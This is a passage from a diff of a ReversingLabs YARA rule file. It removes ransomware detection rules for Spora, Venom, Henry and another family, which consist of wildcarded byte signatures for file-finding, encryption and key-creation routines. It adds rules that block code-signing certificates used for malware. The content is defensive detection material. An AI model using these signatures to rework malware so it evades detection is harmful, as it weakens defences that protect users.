-            48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ??
-            4C 8D 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76
-            ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 8B CB FF 15
-      }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, DIEGO MANUEL RODRIGUEZ" and pe.signatures [ i ] . serial == "2c:84:f9:13:60:59:e9:61:34:f8:76:66:70:ea:cd:52" and 1442215311 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Spora : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6716A9C195987D5Cfe53A094779461E7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Spora ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f07ee1d4-d99b-5cbf-a1f0-a3802d9e3b47"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "fbd05f8b-3289-565c-a5f4-a1514d06ae37"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Spora.yara#L1-L124"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4e18bb42277ce9194bf75fa45d95ea7e2bd51c5d7791d3d6e013fc07626e65b0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13330-L13346"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "648fd70432a791b3e589f5eda1b1510045b465623914a9762ff3dfb4a3e022f8"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Spora"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 57 FF 75 ?? 33 FF 89 7D ?? FF 15 ?? ?? ?? ?? 83 F8
-            ?? 0F 84 ?? ?? ?? ?? A8 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 53 56 57 BE
-            ?? ?? ?? ?? 56 6A ?? 57 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 83 FB
-            ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F
-            82 ?? ?? ?? ?? 6A ?? 57 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 57 8D 45 ?? 50 56 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 39 75
-            ?? 0F 85 ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 3B
-            45 ?? 0F 84 ?? ?? ?? ?? 39 7D ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? B9 ?? ??
-            ?? ?? 3B C1 72 ?? 89 4D ?? EB ?? 83 E0 ?? 89 45 ?? 57 FF 75 ?? 57 6A ?? 57 53 FF 15
-            ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? FF 75 ?? 57 57 6A ?? 50 FF 15 ?? ?? ??
-            ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57 FF
-            75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 8D 45 ?? 50 57 6A ?? 57
-            FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 57 57
-            57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 6A ??
-            57 57 53 89 45 ?? FF 15 ?? ?? ?? ?? 57 8D 45 ?? 50 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50
-            53 FF D6 57 8D 45 ?? 50 6A ?? 8D 45 ?? 50 53 FF D6 C7 45 ?? ?? ?? ?? ?? FF 75 ?? FF
-            15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? C7 45 ??
-            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 5E 5B 8B 45 ?? 5F 83 C5 ?? C9 C2
-        }
-		$create_key_file = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? 33 F6 89 75 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F
-            84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D
-            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 8D 45 ?? 50 8D 45
-            ?? 50 56 6A ?? 56 FF 35 ?? ?? ?? ?? FF D7 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0
-            ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ?? 56 56 56 FF 75 ?? FF D7 85 C0 0F 84 ?? ?? ?? ??
-            53 8B 1D ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B F8 3B FE 0F 84 ?? ?? ?? ?? 56 6A
-            ?? 57 56 FF 15 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50
-            FF 15 ?? ?? ?? ?? 83 C4 ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 68
-            ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7D ??
-            ?? ?? ?? ?? 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? 57 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D3 8B D8 3B DE 74 ?? 89 75 ?? 8B 45
-            ?? 56 FF 74 85 ?? 53 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF
-            15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56 53 57 FF 15 ?? ?? ?? ?? FF
-            45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2
-        }
-		$create_key = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50
-            33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ??
-            FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ??
-            53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ??
-            03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF
-            15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83
-            C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ??
-            FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8
-            51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40
-            38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2
-        }
-		$create_lst_file = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ??
-            ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45
-            ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55
-            ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08
-            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ??
-            8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84
-            ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56
-            56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83
-            C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56
-            56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ??
-            ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57
-            8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2
-        }
-		$enumerate_resources = {
-            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ??
-            85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3]
-            E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A
-            ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ??
-            ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75
-            ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files ) or ( $create_key and $enumerate_resources and $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Technologies Ltd." and pe.signatures [ i ] . serial == "67:16:a9:c1:95:98:7d:5c:fe:53:a0:94:77:94:61:e7" and 1169424000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Venom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_876C00Bd665Df98B35554F67A5C1C32A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Venom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72149ec2-888e-5bed-baf1-0ec44e48328e"
-		date = "2022-06-06"
-		modified = "2022-06-06"
+		id = "830af0ac-fb01-5c6a-a7a3-2cf5c9d016fc"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.Venom.yara#L1-L68"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5817ece6a1cc304835f7fc243c4cfdc3c7cacd2251a9ac294a6662b58d2552e8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13348-L13366"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "90bde1313db78d4166e8c87e7e4111c576880922b1c983f3a842ea030d38a0da"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Venom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$setup_env = {
-            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1B
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 07 6F ?? ??
-            ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 06 11 ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28
-            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 1F
-            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ??
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 20 ?? ?? ?? ?? 19 7E ?? ?? ?? ?? 19 16 7E ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 0D 09 08 20 ?? ?? ?? ?? 12 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 28
-            ?? ?? ?? ?? 00 2A
-        }
-		$find_files = {
-            00 00 00 03 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 00 00 08 72 ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 16 FE 01 0D 09 2C ?? 00 08 02 28 ?? ?? ?? ?? 00 00 00 DE ?? 26 00 00 DE ?? 00 07
-            17 58 0B 07 06 8E 69 32 ?? 00 03 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 13
-            ?? 00 11 ?? 02 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 ?? 00 DE ??
-            26 00 00 DE ?? 2A
-        }
-		$encrypt_files = {
-            00 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 18 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 09 18 6F ?? ?? ?? ?? 00 07 06 20 ?? ?? ?? ?? 73 ?? ?? ?? ??
-            13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F
-            ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 17 6F ?? ?? ?? ?? 00 08 06 16 06
-            8E 69 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ??
-            ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ??
-            ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D
-            ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00
-            DE ?? DE ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 00 00
-            DE ?? 26 00 00 DE ?? 00 DC 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lossera-M, OOO" and ( pe.signatures [ i ] . serial == "00:87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" or pe.signatures [ i ] . serial == "87:6c:00:bd:66:5d:f9:8b:35:55:4f:67:a5:c1:c3:2a" ) and 1493078400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Henry : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_4B093Cb60D4B992266F550934A4Ac7D0 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Henry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "63627f2b-3205-5790-ba97-8e0d1da39d7c"
-		date = "2021-06-14"
-		modified = "2021-06-14"
+		id = "c459c3ac-205c-5c13-959d-c6b40f81222f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Henry.yara#L1-L80"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e6ab2a8a344d40407118e29ff78f5a0144f42a0fbdee19a80b341b59f056d292"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13368-L13384"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4b634bc706638d72f2d036d41cf092cac538e930d7d407eebc225b482fd64f51"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Henry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            02 6F ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C 08 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 06 8E 69 32 ?? 02 6F ?? ?? ?? ?? 0D 16 0B 38 ?? ??
-            ?? ?? 09 07 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 19 17 73 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? D4 8D
-            ?? ?? ?? ?? 13 ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 26 6F ?? ?? ?? ?? 11 ?? 6F ??
-            ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
-            28 ?? ?? ?? ?? 18 18 73 ?? ?? ?? ?? 25 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 07 17 58 0B 07 09 8E 69 3F ?? ??
-            ?? ?? 2A
-        }
-		$encrypt_files = {
-            02 8E 2D ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 03 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73
-            ?? ?? ?? ?? 7A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 28 ??
-            ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 03 08 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 1F ?? 6F ?? ?? ??
-            ?? 07 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 73 ?? ?? ?? ?? 25 02 16 02 8E 69 6F ?? ?? ??
-            ?? 25 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
